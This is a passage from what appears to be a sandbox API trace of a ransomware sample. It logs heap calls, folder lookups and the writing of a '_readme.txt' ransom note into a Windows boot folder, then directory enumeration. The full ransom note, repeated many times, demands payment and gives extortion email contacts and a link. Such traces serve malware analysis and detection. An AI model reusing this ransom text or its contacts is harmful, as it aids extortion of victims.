lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.117] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.119] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0056.119] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.119] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.119] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.119] PathFindFileNameW (pszPath="") returned="" [0056.119] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.119] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.120] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.120] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.120] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0056.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.120] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0056.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.120] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.120] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.120] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.120] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.121] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.121] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.122] CloseHandle (hObject=0x5c8) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.122] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.122] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.122] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.122] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.122] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, 